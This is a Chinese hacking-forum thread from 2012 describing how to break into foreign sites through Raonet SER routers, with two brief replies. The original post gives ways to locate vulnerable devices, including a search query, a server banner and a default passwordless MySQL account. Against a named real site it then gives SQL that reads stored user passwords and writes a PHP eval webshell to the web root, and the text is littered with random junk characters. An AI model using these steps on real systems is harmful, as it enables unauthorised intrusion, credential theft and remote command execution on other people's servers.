找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3031|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:  N3 X8 z6 v2 @

0 R+ J; M' C0 M# S& d" F$ L- [7 H9 |3 O1:google搜索'Raonet Subscriber Ethernet Router'6 |8 O- P$ ^) s1 D
+ m& @* G0 n; K* R. t
2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
# O" e5 S) n; P6 D% r" w  |  O. W5 T; B6 K
3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。+ I% E) b- j* r  X9 @5 {9 }

9 i  i- I& W) ]4 |//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......) T, v. g% d. H  ^

9 M. M; o9 D: w8 H
. L2 |8 ~$ }5 A
4 L4 b, l& b! i! Y6 z( L0 v) Y; L" ^% W入侵步骤:3 l2 f+ Z9 C% Z. Y+ j4 c
4 ?0 ~1 j$ C4 h  l7 ^; }4 A
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php/ F  ~" o; a9 H% K. Z; t
4 F( T3 Q" o6 N5 F4 O. w4 _
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc; _' ~# ^2 h8 e; g7 A( v5 P
3:得到密码后连接,查看GUI管理密码:/ z4 ]: n8 R8 P" a2 x% _
use ser_500& [% s, V; d1 Z& \# B
select id,passwd from user;7 Y0 c1 E- s& |5 D
4:通过数据库写入webshell,执行命令:; {9 ^5 i' D4 ~# l+ w% z
use mysql;
! W9 }, L$ t! `1 Q% Jcreate table ok(cmd TEXT);
, E: U( ?9 I3 A4 i$ H: B; _+ Xinsert into ok values("<?php @eval($_POST[cmd])?>");
: ?0 g2 F* |  I# x5 \select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";% e9 A/ }+ H5 a: M
drop table ok;8 C) X! }3 E1 c. R4 a! H, s

! T5 X% Z' w) u! S5:连接后门shell.php 7 }  X( ~8 V( X

6 g7 x. B4 w3 n7 z6. 搞定!
1 u2 a7 Y9 }2 c2 C" Q! w! m7 P' o; X6 A, i! h
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表